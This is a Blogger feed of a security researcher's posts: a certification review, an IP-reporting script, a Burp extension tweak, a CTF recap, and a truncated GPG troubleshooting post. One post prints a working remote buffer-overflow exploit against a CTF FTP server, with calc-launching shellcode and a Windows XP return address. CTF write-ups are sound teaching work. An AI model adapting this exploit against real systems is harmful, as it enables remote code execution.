tag:blogger.com,1999:blog-83003732024-03-08T10:14:46.242+07:00Life, family, & computer - nobody ®y3dips shares stories about life, family, hacking, computer security, and *nix.y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.comBlogger768125tag:blogger.com,1999:blog-8300373.post-66494239342502554842016-06-14T11:35:00.002+07:002016-06-14T16:53:49.387+07:00Review: eMAPT certification (Bahasa)<div>
<a href="https://www.elearnsecurity.com/certification/emapt/" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgUhEkGTfR4_aRltRqctPQg0BLzYzuTg8YsbpgFiqZo8Mjty59GNUWSWroHhrrwMjpSyPmpCMbzbIxZbXxDvbAVp7PbhPsfE-TrS0arxXBbCSU4VoI2Xcs0pKvKrbeuPq5DbpV/s200/emapt_certificate_sm.png" width="200" /></a>Hallo all, ternyata sudah lebih dari 2 tahun saya sudah tidak pernah menulis di blog ini :(, oleh karena itu sebelum memulai post pertama saya setelah 2 tahun, maka pertama-tama saya mau minta maaf atas semua kesalahan saya, baik yang sengaja atau tidak di sengaja khususnya di bulan baik ini (Ramadan) dan mengucapkan selamat menjalankan ibadah puasa Ramadan dengan baik dan istiqomah.</div>
<div>
<br /></div>
<div>
elearnsecurity <a href="https://www.elearnsecurity.com/certification/emapt">eMAPT</a> dengan kursusnya <i>Mobile Application Security and Penetration Testing</i> (MASPTv1) ini adalah salah satu jenis sertifikasi dan kursus yang langka, kenapa langka? karena sertifikasi terkait <i>mobile security</i> yang bisa saya temukan hanya eMAPT dan GMOB (GMOB: GIAC Mobile Device Security Analyst) keluaran SANS, dan setelah membanding-bandingkan berbagai hal yang ditawarkan maka akhirnya saya pilih sertifikasi dari elearnsecurity.<br />
<br />
<a name='more'></a></div>
<span class="fullpost"></span>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb6gh9oEV9eFkAE44k-oRPtL5jJtolMsQZE2sggcC7h7vd6h4EMGGCuCJFSVzKMQjjmP3YyYBuffJ8oCaCR2288pZEcKAmxZhyphenhyphenzqzS607Xh8npcwWpHSnujq5BrPyhyphenhyphen5NMnR3U/s1600/2016-06-14+11.21.11+am.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb6gh9oEV9eFkAE44k-oRPtL5jJtolMsQZE2sggcC7h7vd6h4EMGGCuCJFSVzKMQjjmP3YyYBuffJ8oCaCR2288pZEcKAmxZhyphenhyphenzqzS607Xh8npcwWpHSnujq5BrPyhyphenhyphen5NMnR3U/s320/2016-06-14+11.21.11+am.png" width="320" /></a>Salah satu hal mengapa saya memilih MASPT adalah karena model kursus yang <i>self-learning</i> (anda cukup download modul dan video),dan diberikan materi untuk labs (aplikasi Android dan iOS), dan <i>hands-on</i> (sejenis dengan kursus dari offensive-security) dan yang terpenting proses sertifikasi dengan ujian praktek. Bagi yang berminat, untuk informasi lengkap terkait kursus ini dapat anda pelajari <a href="https://www.elearnsecurity.com/course/mobile_application_security_and_penetration_testing/">disini</a>.</div>
<br />
<div>
Tetapi berbeda dengan kursus dari offensive-security yang terdapat rentang waktu yang ketat, maka kursus dari elearnsecurity ini sangatlah longar terhadap jadwal baik kursus dan ujian, bahkan untuk saya yang memilih paket "elite" tidak ada batasan waktu kapan ujian (bisa 1 bulan kemudian, atau 10 tahun kemudian). Hal ini pula yang membuat saya yang memulai kursus di februari, baru mengambil ujian pada bulan mei akhir, oleh karena itu hal ini sangat perlu menjadi perhatian serius agar tidak sampai terlewat bagi teman-teman yang nantinya berminat mengambil kursus dari elearnsecurity.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix0jCSRsTcWGB0VE2o6QI-92ZE02zMcxzFzshSu_q_MywUs800EvHVZk0xpvnu6TLDpdJxw4qNbeMCH2ELjBIP5sx0muzp9NRuGEosmA_AstrGQqYkTQwBu4wi3p23DU_gYVt6/s1600/2016-06-12+12.01.16+pm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix0jCSRsTcWGB0VE2o6QI-92ZE02zMcxzFzshSu_q_MywUs800EvHVZk0xpvnu6TLDpdJxw4qNbeMCH2ELjBIP5sx0muzp9NRuGEosmA_AstrGQqYkTQwBu4wi3p23DU_gYVt6/s320/2016-06-12+12.01.16+pm.png" width="320" /></a></div>
Untuk lama waktu ujian yang diberikan memang cukup lama dibanding 2 sertifikasi (<a href="http://clog.ammar.web.id/search/label/oscp">OSCP</a>, <a href="http://clog.ammar.web.id/search/label/osce">OSCE</a>) yang pernah saya ambil 3-4 tahun yang lalu, yaitu 1 minggu (7 hari) :), sehingga seharusnya sangat santai sekali melakukan reversing/analysis/exploitation terhadap aplikasi mobile yang di berikan dan kemudian mengirimkan aplikasi exploit (Source dan binary) yang sudah kita buat.<br />
<br />
Dikarenakan antusiasme saya yang tinggi, setelah 1 hari pengerjaan saya langsung mengirimkan aplikasi exploit, dan tidak seperti 2 sertifikasi sebelumnya yang dalam hitungan hari di jawab perihal hasilnya, tetapi untuk elearnsecurity saya mendapatkan jawaban 16 hari kemudian :P, cukup menyiksa bagi anda yang penasaran. Tetapi apabila exploit anda telah sukses mengeksploit aplikasi (dan dummy application) yang di berikan maka seharusnya anda sudah dapat tenang.<br />
<br />
Bagi anda yang berminat di bidang <i>mobile application security and penetration testing</i> dan butuh sertifikasi maka materi kursus dan sertifikasi eMAPT dari elearnsecurity ini dapat menjadi salah satu pilihan, Good luck :).<br />
<br />
<br />
<div>
</div>
y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com3tag:blogger.com,1999:blog-8300373.post-73914784491094977482014-05-30T10:49:00.001+07:002014-05-30T19:16:32.552+07:00Laporkan Alamat IP: untuk mantan pengguna dyndns versi gratisGw memiliki sebuah wd-booklive (berbasis debian) yang terletak di suatu tempat yang dirahasiakan :) dan gw jadikan server torrent mempergunakan transmission dengan web-ui dan biasanya gw akses (via port-forward di router) via dyndns domain name (*.dyndns.com) dikarenakan ip yang didapatkan dari provider <i>dynamic</i>.
<br />
<br />
Sebagai salah satu pengguna tetap dyndns versi gratis, dan dikarenakan router yang gw pergunakan mendukung (via web management) dyndns untuk <i>dynamic dns </i>gw merasakan kesulitan karena sejak negara api menyerang (:P) maka layanan ini sudah ditiadakan oleh dyndns :(.
<br />
<br />
Dari dulu, gw pengen sekali ngebuatin script untuk kirim info ip saat mesin gw booting, dan baru bisa di wujudkan hari ini. Lewat googling, gw menemukan sebuah link di web ini <a href="http://elinux.org/RPi_Email_IP_On_Boot_Debian">http://elinux.org/RPi_Email_IP_On_Boot_Debian</a> yang berisi bagaimana membuat mesin raspberry melaporkan ip-nya via email. Terdapat beberapa perbedaan, sampai akhirnya gw melakukan beberapa modifikasi sebagai berikut:<br />
<a name='more'></a>y3dips@AliBookLife:~$ cat email_ip.py<br />
<pre class="brush: python">import subprocess
import smtplib
import socket
from email.mime.text import MIMEText
import datetime
to = '****a@gmail.com'
gmail_user = 'un****@gmail.com'
gmail_password = '************'
smtpserver = smtplib.SMTP('smtp.gmail.com', 587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo
smtpserver.login(gmail_user, gmail_password)
today = datetime.date.today()
arg="curl -s checkip.dyndns.org|sed -e 's/.*Current IP Address: //' -e 's/<.*$//'"
p=subprocess.Popen(arg,shell=True,stdout=subprocess.PIPE)
data = p.communicate()
ipaddr = data[0].strip()
my_ip = 'Your ip is %s' % ipaddr
msg = MIMEText(my_ip)
msg['Subject'] = 'IP For exia on %s' % today.strftime('%b %d %Y')
msg['From'] = gmail_user
msg['To'] = to
smtpserver.sendmail(gmail_user, [to], msg.as_string())
smtpserver.quit()</pre>
<pre class="brush: python"></pre>
Kemudian agar setiap reboot maka script tersebut dijalankan, maka cukup ditambahkan ke file /etc/rc.local atau bisa anda jadwal dengan crontab
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1zNK4qkLpJxHhO9bUcBWNzCf2FefrgaaW9BN98p64zMu-s4OVZuio5EO4K3uR9AVgdzAG6eckGt6QzLF9LWXqq3oKQ7kFdDwSU50FiKBkF_v-dee02MEDgYD5EZhib8KAyyyG/s1600/2014-05-30+10.10.47+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1zNK4qkLpJxHhO9bUcBWNzCf2FefrgaaW9BN98p64zMu-s4OVZuio5EO4K3uR9AVgdzAG6eckGt6QzLF9LWXqq3oKQ7kFdDwSU50FiKBkF_v-dee02MEDgYD5EZhib8KAyyyG/s1600/2014-05-30+10.10.47+am.png" height="105" width="320" /></a>
<br />
<br />
Sehingga apabila server reboot, saat menyala akan terkirim email seperti berikut:
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirL-Uea725H8AyAKeiLJ2WNUSeXnK6dUbizQfi-NCoauriof8xvCIiqDMNf1A1bPpZELhgzh9Fu65S1xQvAwDSVIAGq2DkBT09F8SZYQzNVMqUFGqEy2qS9B2UICAcmQNpge3n/s1600/2014-05-30+10.11.35+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirL-Uea725H8AyAKeiLJ2WNUSeXnK6dUbizQfi-NCoauriof8xvCIiqDMNf1A1bPpZELhgzh9Fu65S1xQvAwDSVIAGq2DkBT09F8SZYQzNVMqUFGqEy2qS9B2UICAcmQNpge3n/s1600/2014-05-30+10.11.35+am.png" height="200" width="320" /></a>
<br />
<br />
Apabila anda tidak mendapatkan hasil seperti berikut ini, pastikan dns server di set dengan baik, karena pada mesin wd yang saya miliki, dns akan otomatis di set ke ip mesin sendiri, jadi perlu di set dan ditambahkan info dns secara static pada file /etc/network/interfaces.<br />
<br />
Sebenenarnya banyak yang menarik lainnya dari isi wd itu sendiri (eg: <i>hardcoded password)</i> :), tetapi kali ini baru bisa bahas ini. Semoga bermanfaat dan seperti biasa, enjoy \m/.y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-15020619761870528582014-02-19T18:01:00.000+07:002014-02-19T18:03:09.184+07:00Burp Extender: Target IP Changed during pentest.It's been so long since the last time i've updated this blog. I regularly shared my thought mostly at <a href="http://twitter.com/y3dips" target="_blank">@twitter</a> now :), but i realize that for some reason, it's not a good place, especially for a long story with images :|.<br />
<br />
Ok, this problem started when i do pen-testing job, and i had to re-scanning some web application, and the web server ip address is already changed, mostly happen because 1st time I scanned using internet ip and then when doing an internal pentest, i'm using internal web address. So, i ask to <a href="https://twitter.com/y3dips/status/431284857894084608" target="_blank">Dafydd</a>, if these feature exists, but apparently only for target with hostname is supported, see image below, e.g: for domain "test.com".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2nZnzCi4kMRt7EVfVarAuZbcbLgdhiywRgZ9YEZ64cVLacdblPpFPk43Gss550ijk5eNyY8ZDKl3QLavmK2k4pcwR56f5JG8uSZ0Ya-da_E3eslAzrg04AXXqFashmH1AgTlP/s1600/2014-02-19+05.23.04+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2nZnzCi4kMRt7EVfVarAuZbcbLgdhiywRgZ9YEZ64cVLacdblPpFPk43Gss550ijk5eNyY8ZDKl3QLavmK2k4pcwR56f5JG8uSZ0Ya-da_E3eslAzrg04AXXqFashmH1AgTlP/s1600/2014-02-19+05.23.04+pm.png" height="400" width="352" /></a></div>
<br />
<a name='more'></a>Fortunately there is an easy solution, with only one simple extension called "trafic redirector", see the details <a href="http://blog.portswigger.net/2012/12/sample-burp-suite-extension-traffic.html" target="_blank">here</a>, we should be able to redirect the traffic. At first i choose the java extension, but after compiling it into .jar and try to load it, i get <a href="http://twitter.com/y3dips/status/431318381505945601/photo/1" target="_blank">"strange"</a> java error, so i use the python version, and to use it we only need to modify the address from the "TraficRedirector.py".<br />
<br />
<pre class="brush: python">from burp import IBurpExtender
from burp import IHttpListener
class BurpExtender(IBurpExtender, IHttpListener):
HOST_FROM = "110.94.90.59"
HOST_TO = "172.24.101.2"
</pre>
<br />
<div>
To run the python extensions under burp extender, you need to install jython in your machine, and for Mac users, you can just use brew to get <a href="http://www.jython.org/" target="_blank">jython</a> installed on your machine.</div>
<div>
<br />
<pre>$brew install jython</pre>
</div>
<div>
<br /></div>
<div>
and then define your jython path at burp Extender options,<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiydq4JgMBI1h8ynWYl1ydaHXz8zT6GNLp1I2fLuFaYh0dNhi4Xl6j-8ivJk6XiuF_-plbXGKCe8I4QZv3pAnISpZXIlxxfqrPJl5yidZgKtLfqxv9mlp324Qtlph3zLepB_CZt/s1600/2014-02-19+05.17.42+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiydq4JgMBI1h8ynWYl1ydaHXz8zT6GNLp1I2fLuFaYh0dNhi4Xl6j-8ivJk6XiuF_-plbXGKCe8I4QZv3pAnISpZXIlxxfqrPJl5yidZgKtLfqxv9mlp324Qtlph3zLepB_CZt/s1600/2014-02-19+05.17.42+pm.png" height="322" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
and then load the "Traffic Redirector" extensions</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqQZUpx68MrSaWGOn-aKpfEI0VYruNbIqdKoN4VL9K0CotfwR6xWfkbcYc3jGtNWLhBvsnXBjwZsz_xg3tyyBEui4VwPuwMdXiEZfg1O88yL_EePDLWHXHvQFMIUUyL3uCXeqz/s1600/2014-02-19+05.17.54+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqQZUpx68MrSaWGOn-aKpfEI0VYruNbIqdKoN4VL9K0CotfwR6xWfkbcYc3jGtNWLhBvsnXBjwZsz_xg3tyyBEui4VwPuwMdXiEZfg1O88yL_EePDLWHXHvQFMIUUyL3uCXeqz/s1600/2014-02-19+05.17.54+pm.png" height="307" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Ok now, we are good to go.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /></div>
y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com0tag:blogger.com,1999:blog-8300373.post-35634121897411161222013-10-20T14:05:00.000+07:002013-10-21T08:51:46.321+07:00Oleh-oleh CTF HITB 2013 <span class="fullpost"></span><br />
Berikut ini sedikit oleh-oleh dari keikutsertaan tim Rentjong kemarin di CTF HITB2013 di Kuala Lumpur kemarin yang berlangsung selama 2 hari (16,17 Oktober). Dan sebelum panjang lebar, sepertinya kami adalah tim satu-satunya yang baru pertama kali ikut CTF yang di selenggarakan HITB ini atau jenis ctf sejenis berskala internasional, sedangkan tim lain kemungkinan besar sudah lebih dari 1 kali mengikuti permainan yang di selenggarakan pada event konferensi Hack In the box baik yang di laksanakan di Malaysia, Belanda atau Dubai atau mengikuti event lainnya.<br />
<br />
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvOCslfdCHVzn3VUulfwc2i2-ypWwtqMvslc-3Tg5f4jl69-jNOhXuSpJLipC1nGsxQFFZZ3r4C28AU2S4f1zWTCBaiM_vf4Pw8W0AVhe7ahq9-RBTVne5kQR39n0BWtnoRv9U/s1600/Untitled.tiff" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvOCslfdCHVzn3VUulfwc2i2-ypWwtqMvslc-3Tg5f4jl69-jNOhXuSpJLipC1nGsxQFFZZ3r4C28AU2S4f1zWTCBaiM_vf4Pw8W0AVhe7ahq9-RBTVne5kQR39n0BWtnoRv9U/s320/Untitled.tiff" width="320" /></a>Pada Lomba kali ini Tim Rentjong(Alhamdulillah) berhasil berada di tempat ke-3 setelah kami secara taktis meluncurkan nuklir ke tim dari Belanda yang saat itu berada di posisi ke-3 dengan selisih 200 poin dengan kami yang saat itu di posisi ke-4, dan setelah kami meluncurkan nuklir maka nilai mereka (HP) berkurang secara drastis 500 poin dan mereka terlempar ke posisi 6 di 2 menit terakhir permainan.</div>
<div>
<br /></div>
<div>
Selama 2 hari tersebut terdapat 4 challenge yang berupa daemon, 3 challenge dan 3 bonus challenge. Pada hari pertama challenge yang diaktifkan adalah 3 daemon dan 1 challenge, dan sisanya diaktifkan di hari kedua bahkan beberapa mendekati habisnya waktu ctf. <i>Challenge-challenge </i>tersebut diantaranya adalah e<i>xploitation</i>, <i>reversing</i>, <i>forensic</i>, dan <i>cryptography</i>.</div>
<div>
<br />
<a name='more'></a></div>
<div>
Adapun jalannya pertandingan di hari pertama, tim rentjong memulainya dengan baik, khususnya melakukan <i>defence </i>dan memastikan seluruh daemon berjalan dengan baik untuk mendapatkan HP dan cash, sampai akhir hari pertama tim rentjong berada di posisi ke-2. Hari pertama kami dihabiskan dengan berupaya menyelesaikan 3 daemon yang ada dengan membagi tiap daemon ke tiap member tim rentjong, tetapi saat dihotel kami fokuskan ke daemon 1 sampai berhasil membuat exploitnya, walau exploit yang berhasil di buat tidak memungkinkan untuk mendapatkan flag, dan sepertinya memang tidak bisa karena diputuskan di ganti oleh panitia di hari ke-2 :|.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFp2ArNMzVwcPmjk9AZ1E5hhxiOuL5xJTkFe8qirOwG9pnLXZK6kDcZHK3htEV08KeCueTeUsYGMJ2q0h0TEnolFnEpV9kHQ2S_HBhnGfIH72_HRtrVO-_550VB1TjyxZ85LpA/s1600/BW1mfL2CMAAVN0g.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFp2ArNMzVwcPmjk9AZ1E5hhxiOuL5xJTkFe8qirOwG9pnLXZK6kDcZHK3htEV08KeCueTeUsYGMJ2q0h0TEnolFnEpV9kHQ2S_HBhnGfIH72_HRtrVO-_550VB1TjyxZ85LpA/s320/BW1mfL2CMAAVN0g.jpg" style="cursor: move;" width="320" /></a></div>
<div>
Dihari kedua, saat mulai banyak <i>challenge </i>(tambahan daemon, challenge, bonus challenge) dikeluarkan maka pembagian tugas menjadi mulai sedikit tidak sesuai harapan, mungkin juga dikarenakan ini baru pertama bagi tim rentjong, sehingga kami sedikit keteteran dengan pembagian tugas untuk <i>attack</i> dan <i>defence.</i></div>
<div>
<br /></div>
<div>
Tetapi saat bonus-challenge 3 di keluarkan, dalam waktu yang tidak cukup lama tim rentjong berhasil menyelesaikannya dan mendapatkan 1 senjata nuklir, penggunaan nuklir tidak akan menambah HP atau cash, tetapi akan mengurangi poin sebanyak 500 ke tim (negara) yang menjadi target, serta tim/negara tersebut membutuhkan waktu dan cash untuk memperbaikinya.</div>
<div>
<br /></div>
<div>
Saat 1 jam tersisa posisi kami adalah di posisi 4 dan hampir seluruh point yang kami miliki didapatkan dari nilai <i>defence</i>, walau beberapa <i>challenge partially</i> kami dapatkan tetapi belum menghasilkan flag yang benar. Saat itulah kami memutuskan untuk mempergunakan nuklir ke tim dari belanda yang saat itu berada di posisi 3 yang memiliki selisih 200 poin diakhir-akhir waktu, tepatnya 3 menit menjelang berakhirnya waktu CTF, dan itulah yang membuat posisi kami naik ke urutan 3.</div>
<div>
<br /></div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVaYh69O_psNFrtoykzrk4jEWs3AGpuxPGzDFWB4jWoJFDCLtOqV5oWdnwGpVBVOWPMRFMcb5ixkDaEWIZp2hAFhDXaoTaYCh4YivNVYP5D5cOcTriExpkTkMFtMwqrjvnw5Fh/s1600/jczjK.jpeg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVaYh69O_psNFrtoykzrk4jEWs3AGpuxPGzDFWB4jWoJFDCLtOqV5oWdnwGpVBVOWPMRFMcb5ixkDaEWIZp2hAFhDXaoTaYCh4YivNVYP5D5cOcTriExpkTkMFtMwqrjvnw5Fh/s320/jczjK.jpeg" width="320" /></a>Ini adalah pengalaman berharga buat tim Rentjong di kali pertama mengikuti <i>offline CTF </i>dengan format <i>attack-defence </i>serta skenario. Dan selebihnya ini adalah permainan yang menyenangkan, selamat buat crew CTF HITB yang membuat permainan hacking menjadi sangat menarik, dan nantikan tim Rentjong di event selanjutnya :)</div>
<div>
<br /></div>
<div>
Adapun beberapa hal yang membuat kami kurang maksimal khususnya dalam "<i>attack</i>" diantaranya adalah:</div>
<div>
<br /></div>
<div>
1. Kami masih belum paham benar konsep dari permainan secara pasti, seperti contohnya saat kami mengira setelah mendapatkan kode nuklir dengan menyelesaikan <i>bonus challenge</i>, maka tim selanjutnya tidak akan mendapatkan lagi nuklir tersebut, atau dengan senjata <i>firepower</i> tidak mengurangi HP dan cash.</div>
<div>
2. Kami tidak mengetahui pasti (sampai kami mencobanya) apabila nuklir diluncurkan ke negara yang juga memiliki nuklir akan menjadi tidak aktif dan tidak dapat mempergunakan nuklir yang dimilikinya (terkait permanen atau sementara hal ini belum bisa kami buktikan)</div>
<div>
3. Hari pertama sampai pagi esok harinya (karena dilanjutkan di hotel) kami masih fokus mengerjakan daemon1 (gov-center) dan pada akhirnya berhasil membuatkan exploitnya, walau kami mengetahui bahwa mustahil untuk menyuntikkan payload yang bermanfaat karena jumlah byte (space) tersedia yang amat sangat terbatas (12 bytes setelah dikurangi alamat RET-libc), dan ternyata saat dimulai hari kedua daemon ini secara meyakinkan di ganti oleh panitia :|</div>
<div>
4. Terdapat beberapa <i>challenge/bonus-challenge</i> yang di ganti file/binary-nya setelah di sebarkan beberapa saat sebelumnya :|</div>
<div>
5. Tidak ada tim dari Indonesia lainnya yang juga berkompetisi, sementara vietnam yang menjadi juara 1 dan 2 adalah pemain lama dan juga pasti bekerjasama baik langsung dan tidak langsung :), bahkan antar tim lain beda negara bisa terjadi aliansi, dan hal ini sepenuhnya belum kami pahami diawal CTF.</div>
<div>
<br /></div>
<div>
Terakhir, selamat buat Tim Rentjong (<a href="https://twitter.com/rizki81" target="_blank">Rizki Wicaksono</a>, <a href="https://twitter.com/0x5t" target="_blank">Arif Dewantoro</a>) dan semoga kita bisa ikut kembali di event sejenis ;)</div>
<div>
<br /></div>
<div>
<br /></div>
y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com6tag:blogger.com,1999:blog-8300373.post-82798058929586386752013-06-17T14:03:00.000+07:002014-03-01T10:55:21.419+07:00IDSECCONF 2013 ctf offline: exploitation challenge (500) exploit<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLiRsmB9UvjEX9xHZQxUH4FBbx5-xPCBflMYN_KVrgNmu5SCgSo_tkWVB4_JNfW0GvJxVncUK4UyK_rBOcQMzQHtTDb3_Re-RuIm3uaDqD4aQ8KWTYfdJi_d6T2bBG5OKYfNsk/s1600/myftpd.tiff" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLiRsmB9UvjEX9xHZQxUH4FBbx5-xPCBflMYN_KVrgNmu5SCgSo_tkWVB4_JNfW0GvJxVncUK4UyK_rBOcQMzQHtTDb3_Re-RuIm3uaDqD4aQ8KWTYfdJi_d6T2bBG5OKYfNsk/s200/myftpd.tiff" height="170" width="200" /></a>This is the exploit code for exploiting the stack-based buffer overflow in myftpd (500 point exploitation challenge) during the<a href="http://2013.idsecconf.org/" target="_blank"> IDSECCONF</a> offline CTF, none of the team were able to wrap up a working remote exploit, altough one team were able to get correct offset to overwrite EIP, but that didn't give them any point (unless, for e.g: able to call winexec and launching calc, even if they were not able to do the remote shell)<br />
<br />
<span class="fullpost">
And for all the team that played yesterday, you can use this skeleton (only with calc payload) exploit to wrap up your remote-code-execution exploit and get the flag.txt file at Desktop directory (inside the Windows VM you are copying).<br />
</span><br />
<a name='more'></a><span class="fullpost">And as for the hint, still the same, you will have very limited chars (many bad chars) and limited space (best bet is to craft your own shellcode). Good luck and enjoy!<br />
</span><br />
<pre class="brush: python">#!/usr/bin/env python
from socket import *
import sys
from time import sleep
if len(sys.argv) != 3:
print "[-]Usage: python %s <ip> <port>" % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
#winexec calc taken from : http://code.google.com/p/win-exec-calc-shellcode/
shellcode=("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7\xCC")
#jmp esp 7c941eed win xp pro sp 2
payload ="\x90"*50+shellcode+"\x90"*(234-len(shellcode))+"\xed\x1e\x94\x7c"
payload +="\x90"*14
#let's use kewl way to jump back 256 using ecx
payload +="\x33\xc9" #XOR ECX,ECX
payload +="\x54" #PUSH ESP
payload +="\x59" #POP ECX
payload +="\xfe\xcd" #DEC CH, jumpback 256 \m/
payload +="\xff\xe1" #JMP ECX
print "[+]Connecting with server..."
sleep(1)
try:
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(1024)
s.send("USER test\r\n")
s.recv(1024)
s.send("PASS test\r\n")
s.recv(1024)
s.send("QUIT "+payload+"\r\n")
s.close()
print "[+]Exploit Success!"
except:
print "[*]Exploit Failed, Cannot connect to server: "+ip
</pre>
<br />
<b>Update</b>: OJ creates an excellent write-up about this challenge <a href="http://buffered.io/posts/idsecconf-2013-myftpd-challenge/">here</a>, thanks mate.<br />
<br />
<br />y3dipshttp://www.blogger.com/profile/17213969345889442559noreply@blogger.com6tag:blogger.com,1999:blog-8300373.post-42182481729769314742013-05-24T15:29:00.001+07:002013-05-24T15:30:16.702+07:00MacGPG2: GPG keychain Access failed to add/import public keyA few days ago <a href="https://gpgtools.org/" target="_blank">GPGtools</a> releasing their latest Gpg Application (<a href="https://gpgtools.org/installer/index.html" target="_blank">MacGPG2</a>) and other tools version for Mac OSX Mountain Lion. <a href="https://gpgtools.org/keychain/index.html" target="_blank">GPG Keychain Access</a> was a specific tools in a bundle to maintain the GPG Keys.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvfMw_vI0r7ppjcMl_avZFTZJAZkdx4-2iw9BoQNuGIGVp1ZIjcy2vgZ3wLJO5ONrkdKXakrd6tcYaoy3fzmxp82Uez3jGTwUpEBXSxu77US1G9GGpG953Mctx6ovBO5B27Vy9/s1600/2013-05-24+02.49.31+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvfMw_vI0r7ppjcMl_avZFTZJAZkdx4-2iw9BoQNuGIGVp1ZIjcy2vgZ3wLJO5ONrkdKXakrd6tcYaoy3fzmxp82Uez3jGTwUpEBXSxu77US1G9GGpG953Mctx6ovBO5B27Vy9/s320/2013-05-24+02.49.31+pm.png" width="320" /></a></div>
<br />
So, i updated my beta-version yesterday to the latest version, and today, I encounter a problem that made me unable to import a keys, even when the status are without any error, and saying that the key was processed. But, when i checked the list of the key imported, the latest key wasn't there.<br />
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
